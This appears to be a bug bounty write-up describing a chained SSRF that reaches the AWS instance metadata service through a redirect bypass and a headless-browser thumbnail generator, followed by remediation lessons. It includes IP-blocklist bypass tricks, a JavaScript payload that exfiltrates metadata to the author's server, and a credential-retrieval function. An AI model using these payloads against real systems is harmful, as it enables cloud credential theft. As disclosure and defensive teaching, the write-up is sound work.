There are moments in bug bounty where you stop and think: I should probably stop here.
Not because you’re doing anything wrong. But because what you’re looking at is so much worse than you expected that continuing feels like walking deeper into a building that’s already on fire.
This was one of those moments.
It started with a URL field. It ended with me holding AWS credentials that could provision infrastructure, read S3 buckets, and enumerate their entire cloud environment.
Let me walk you through it.
What Is SSRF and Why Should You Care
Server-Side Request Forgery. The name is almost too polite for what it actually is.
Here’s the concept: some applications accept a URL as user input, and then their server goes and fetches that URL. The idea is usually legitimate — import an image from a link, fetch metadata from a website, preview a URL, generate a PDF from a webpage.
The problem is when the server making that request has access to things the user shouldn’t.
Like internal services. Like cloud provider metadata endpoints. Like databases that aren’t supposed to be internet-facing.
When you control the URL the server fetches, you control where the server goes. And the server can go places you, as an external user, absolutely cannot.
That’s SSRF. You’re not attacking the server directly. You’re convincing the server to attack itself on your behalf.
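To make that concrete, here's a minimal sketch of the vulnerable pattern — the names are illustrative, not from any real codebase. It's an "import from URL" helper that fetches whatever the user supplies, with no check on where the URL actually points:

```javascript
// A minimal sketch of the vulnerable pattern (illustrative names only):
// the server fetches whatever URL the user hands it.
async function importFromUrl(url) {
  const res = await fetch(url); // Node 18+ global fetch
  // Nothing stops `url` from being http://169.254.169.254/latest/meta-data/
  // instead of a legitimate image link. The request originates from the
  // server's network position, not the user's.
  return Buffer.from(await res.arrayBuffer());
}
```

One line of missing validation is the entire vulnerability class.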
The Target
Let’s call it redacted-media.com — a content management platform used by marketing teams to manage assets, schedule posts, and generate reports. Mid-sized company, well-funded, the kind of platform that handles a lot of sensitive brand data for enterprise clients.
The bug bounty program had been running for two years. Decent payouts. Clear scope. They specifically called out SSRF as a high-priority finding category, which either meant they cared about it or they’d already been burned by it once.
I suspected the latter.
Finding the Entry Point
The feature that caught my eye was the “Import from URL” function in their media library.
You paste a URL. The platform fetches the image or file at that URL. It imports it into your workspace.
Completely normal feature. Extremely dangerous if implemented carelessly.
I started by pointing it at my own server — a simple VPS with a request logger running. I submitted a URL like:
http://my-server.com/test.jpg
My server received the request. The User-Agent header said something like:
redacted-media-importer/1.2 (Linux; internal-fetch-service)
So it was a dedicated internal service doing the fetching. Not the main application server. An internal microservice with its own identity, its own network position, and presumably its own access rights.
This was interesting.
Testing Internal Reach
The first thing you do with a potential SSRF is test whether you can reach internal addresses.
I tried:
http://localhost/
http://127.0.0.1/
http://0.0.0.0/
http://[::1]/
The application blocked these with an error: “URL not allowed: private IP ranges are restricted.”
Okay. They’d thought about this. They had an IP blocklist.
But IP blocklists have bypass techniques. The most common:
DNS rebinding — your domain resolves to a public IP first, passes the check, then resolves to an internal IP for the actual request. Requires setup but works against naive implementations.
Decimal IP notation — http://2130706433/ is 127.0.0.1 in decimal. Some blocklists check string patterns, not actual IP ranges.
IPv6 representations — http://[::ffff:127.0.0.1]/ is loopback. Some blocklists miss IPv6 variants.
Redirects — point to a public URL that redirects to an internal one. If the application follows redirects without re-checking the destination IP, you bypass the filter.
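The decimal trick is worth seeing in numbers. An IPv4 address is just a 32-bit integer in dotted disguise, and most URL parsers accept the bare integer form — so a blocklist matching the string "127.0.0.1" never fires. A quick sketch of the conversion:

```javascript
// Convert between dotted-quad and bare-decimal IPv4 notation.
function dottedToDecimal(ip) {
  // Each octet is one byte: a.b.c.d == a*256^3 + b*256^2 + c*256 + d
  return ip.split('.').reduce((acc, octet) => acc * 256 + Number(octet), 0);
}

function decimalToDotted(n) {
  return [24, 16, 8, 0].map(shift => (n >>> shift) & 255).join('.');
}

// dottedToDecimal('127.0.0.1')       -> 2130706433
// dottedToDecimal('169.254.169.254') -> 2852039166
```

A robust filter normalizes the host to a canonical IP before checking it, instead of pattern-matching strings.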
I tried the redirect approach first because it’s the cleanest.
I set up a redirect on my server:
HTTP 302 -> http://169.254.169.254/
That IP — 169.254.169.254 — is the AWS instance metadata service. It’s accessible from within any EC2 instance and returns information about the instance including, critically, IAM role credentials.
I submitted my server URL to the import function.
The application fetched my URL. My server issued the redirect. The application followed it.
And then my request logger showed something that made my stomach drop.
No — wait. Let me be precise.
My request logger didn’t show anything new. What happened is: the application went silent for about four seconds. Then it returned an error: “Could not import file: unexpected content type.”
That error — unexpected content type — meant it had successfully fetched something. It just wasn’t an image.
It had fetched the metadata endpoint. And returned an error because the response wasn’t a JPEG.
Confirming the Read
I needed to see what it actually fetched. The error message wasn’t giving me the content.
I adjusted my approach. Instead of redirecting to the metadata endpoint directly, I redirected to a URL I controlled that would then log whatever the server received.
Wait — that’s backwards. I needed the application’s server to fetch the metadata and then give me the response.
The trick I needed was out-of-band exfiltration.
My first instinct was to have my server respond with a tiny piece of JavaScript — but no. This was a plain HTTP fetch by an internal service, not a browser. Nothing would execute a script.
My second instinct was Burp Collaborator (built into Burp Suite Professional), which logs every incoming request in full. But that only helps when the target sends something to you — and the application wasn't sending the fetched content anywhere I could intercept. It processed the response internally and returned only an error.
So I needed a way to get the content out.
I tried a different endpoint on the metadata service:
http://169.254.169.254/latest/meta-data/
This returns a list of available metadata keys — not sensitive by itself. But it would confirm whether I could read from the endpoint at all.
I redirected to it. The application returned: “Could not import file: unexpected content type.”
Same error. But wait — the response time was different. When I redirected to a URL that didn’t exist, the error was near-instant. When I redirected to the metadata service, there was a consistent three-to-four second delay.
Timing oracle. The metadata service was responding. The application was reading it. It just wasn’t showing me the content.
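The decision rule I was effectively applying can be sketched as a tiny helper — the thresholds here are assumptions, and in practice you take several timing samples per target to smooth out network noise:

```javascript
// A minimal timing-oracle sketch: blind SSRF often leaks nothing but
// response time. Take several samples per target, compare medians, and
// flag a target as "reachable" when it is consistently slower than a
// known-dead baseline (e.g. a redirect to a nonexistent internal host).
function median(xs) {
  const s = [...xs].sort((a, b) => a - b);
  const mid = Math.floor(s.length / 2);
  return s.length % 2 ? s[mid] : (s[mid - 1] + s[mid]) / 2;
}

function looksReachable(baselineMs, sampleMs, factor = 3) {
  // baselineMs: timings for the dead target (near-instant error)
  // sampleMs:   timings for the candidate endpoint
  return median(sampleMs) > median(baselineMs) * factor;
}
```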
Getting the Response Out
This is where SSRF gets genuinely creative.
I needed to make the application’s fetch service send the metadata content somewhere I could read it. Since I controlled the redirect destination, I could point it at anything — including a URL that encoded the response.
But that’s not how HTTP redirects work. The redirect just tells the client where to go. I couldn’t make the response from endpoint A automatically get sent to endpoint B.
What I could do: chain the vulnerability with another technique.
The import service, when it encountered a non-image response, returned an error. But what if the response looked like an image header?
I set up my server to do this:
- Receive the initial request from the application
- Respond with a redirect to the metadata endpoint…
No. Still wouldn’t give me the response content.
I stepped back and thought about this differently.
The application had another feature: URL-based thumbnail generation. You paste a URL for a webpage and it generates a preview thumbnail using a headless browser.
Headless browsers are goldmines for SSRF because they execute JavaScript. If I could get the headless browser to visit a page I controlled, I could have that page make a fetch request to the metadata endpoint and exfiltrate the response to my server.
This is sometimes called client-side SSRF via a headless browser. The mechanism differs slightly from classic server-side fetching, but it's equally devastating.
I created a simple HTML page on my server:
<script>
fetch('http://169.254.169.254/latest/meta-data/iam/security-credentials/')
  .then(r => r.text())
  .then(data => {
    fetch('https://my-server.com/log?data=' + btoa(data));
  });
</script>
I submitted this URL to the thumbnail generator.
Twenty seconds later, my server received a GET request.
The data parameter, base64 decoded, contained:
redacted-iam-role-name
The name of the IAM role attached to their EC2 instance.
I had confirmed SSRF with data exfiltration via the headless browser. The metadata service was reachable. The response was readable. And I could exfiltrate it.
How Far Does This Go
I want to be clear: I stopped here.
I did not request the actual credentials. I did not make any further calls to the metadata service beyond confirming the role name existed. I did not access any S3 buckets, any internal services, any other AWS resources.
But I want to explain what would have been possible, because the triage team needed to understand the full blast radius.
The AWS instance metadata service, at http://169.254.169.254/latest/meta-data/iam/security-credentials/[role-name], returns temporary AWS credentials in JSON format:
{
  "Code": "Success",
  "Type": "AWS-HMAC",
  "AccessKeyId": "...",
  "SecretAccessKey": "...",
  "Token": "...",
  "Expiration": "..."
}
These are real, functional, temporary AWS credentials with the permissions of whatever IAM role is attached to that EC2 instance.
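Retrieving them takes nothing more than two unauthenticated GETs against IMDSv1. Here's a sketch of the step I deliberately did not execute — the base URL is a parameter precisely so this illustration never has to touch a real metadata service:

```javascript
// The unexecuted final step, sketched: under IMDSv1, role credentials are
// two unauthenticated GETs away. Base URL is parameterized for illustration.
async function stealCredentials(base = 'http://169.254.169.254') {
  const prefix = `${base}/latest/meta-data/iam/security-credentials/`;
  const role = (await (await fetch(prefix)).text()).trim(); // role name
  return (await fetch(prefix + role)).json();               // credentials JSON
}
```

That's the entire distance between "SSRF to metadata endpoint" and "valid AWS credentials."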
If that role had — as is distressingly common — overly broad permissions, an attacker with those credentials could:
- List and read all S3 buckets in the account
- Access secrets stored in AWS Secrets Manager
- Enumerate EC2 instances, RDS databases, and other infrastructure
- Create new IAM users with persistent access
- Access any service the role had permissions for
This is not theoretical. This attack chain — SSRF to metadata endpoint to credential theft to cloud account takeover — has been used in real-world breaches. Capital One. Others that were never publicly disclosed.
I had confirmed two-thirds of that chain. I stopped before the third.
The Report
This was the most carefully written report I’ve ever submitted.
Title: Blind SSRF via URL Import + Headless Browser SSRF via Thumbnail Generator — Combined Chain Enables AWS EC2 Instance Metadata Access and Credential Exfiltration
Severity: Critical
Impact: Chained SSRF vulnerabilities allow an attacker to make the application’s internal services fetch arbitrary URLs, including the AWS EC2 instance metadata endpoint at 169.254.169.254. The headless browser component allows JavaScript execution enabling active exfiltration of metadata responses to attacker-controlled infrastructure. Demonstrated capability: retrieval of the IAM role name attached to the instance. Full exploitation path (not executed): retrieval of temporary AWS credentials, enabling potential cloud account access with permissions of the attached IAM role.
I included:
- Full HTTP request/response logs for both SSRF vectors
- The JavaScript payload used (with explanation that it was limited to IAM role name only)
- Base64 decoded proof showing the role name received on my server
- Detailed explanation of the full attack chain and its real-world precedents
- Specific remediation recommendations
Their Response
The triage team responded in three hours. At 11 PM on a Friday.
That’s how you know it’s critical. Security people don’t respond to informational findings at 11 PM on a Friday. They respond to things that wake them up from half-sleep because their phone won’t stop buzzing.
Within twenty-four hours:
- The URL import feature was temporarily disabled
- The thumbnail generator was moved to an isolated network segment with no access to internal IP ranges
- IMDSv2 (Instance Metadata Service v2) was enforced on all EC2 instances — this requires a session token header that JavaScript fetch requests don’t include by default, which would have blocked my exfiltration technique
Within a week:
- Both features were re-enabled with proper SSRF protections
- All URL inputs now resolve the destination IP and validate it against a blocklist that correctly handles redirects, IPv6, decimal notation, and other bypass techniques
- A WAF rule was added to block requests to metadata IP ranges at the network level as defense in depth
The response was genuinely impressive. Fast, thorough, multi-layered.
Bounty: $$$$
The program lead also sent a personal message saying this was one of the most well-documented reports they’d received. Which I appreciated. Writing good reports is underrated.
Technical Lessons
Redirect-following without re-validation is extremely common.
Most SSRF protections check the URL you submit. They don’t re-check the IP after following redirects. This single oversight makes a huge percentage of SSRF filters bypassable.
The fix: resolve the final destination IP after following all redirects and validate that against your blocklist.
Headless browsers are a different threat model.
When your application uses a headless browser to process user-supplied URLs, you’re not just making an HTTP request — you’re executing a full browser environment that can run JavaScript, follow links, make additional requests, and exfiltrate data through any available channel.
Headless browser SSRF is often overlooked because it doesn’t look like “normal” SSRF. Treat it as a separate, critical attack surface.
IMDSv2 is not optional if you’re on AWS.
IMDSv2 requires a PUT request with a session token before you can make GET requests to the metadata service. This breaks the simple JavaScript fetch approach used in this attack. It’s a small configuration change with massive security impact.
If you’re running anything on EC2 and IMDSv2 is not enforced: fix this today.
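The handshake itself is tiny. A sketch of what an IMDSv2 client has to do — base URL parameterized for illustration — and note the PUT with a custom header, which is exactly the request a cross-origin browser fetch() cannot make:

```javascript
// IMDSv2's token handshake, sketched with Node's global fetch:
// first a PUT to mint a session token, then GETs that present it.
async function getMetadata(path, base = 'http://169.254.169.254') {
  const token = await (await fetch(`${base}/latest/api/token`, {
    method: 'PUT',
    headers: { 'X-aws-ec2-metadata-token-ttl-seconds': '21600' },
  })).text();
  const res = await fetch(`${base}/latest/${path}`, {
    headers: { 'X-aws-ec2-metadata-token': token },
  });
  return res.text();
}
```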
SSRF chains are more dangerous than single-vector SSRF.
Neither vulnerability here was devastating in isolation. The URL import was blind — I couldn’t read the response. The thumbnail generator, on its own, looked like an unremarkable preview feature.
Combined, they formed a complete attack chain. Always look for how SSRF findings interact with other features.
Closing Thought
I’ve found a lot of bugs. Most of them are satisfying in a clean, technical way. You find the flaw, you document it, you get paid, the world is slightly more secure.
This one was different.
This one had me sitting at my desk at 1 AM genuinely thinking about what would have happened if someone less scrupulous had found it first. Their cloud environment. Their IAM role. The data in those S3 buckets.
Bug bounty programs exist because the math is simple: paying researchers to find vulnerabilities is cheaper than having attackers find them first.
This particular math checked out very clearly.
Reported through the official bug bounty program. Testing was limited to confirming the IAM role name only — no credentials were requested, no AWS resources were accessed, no data was exfiltrated beyond the role name used for proof-of-concept. All proof-of-concept infrastructure was immediately decommissioned after the report was accepted. Domain redacted per responsible disclosure norms.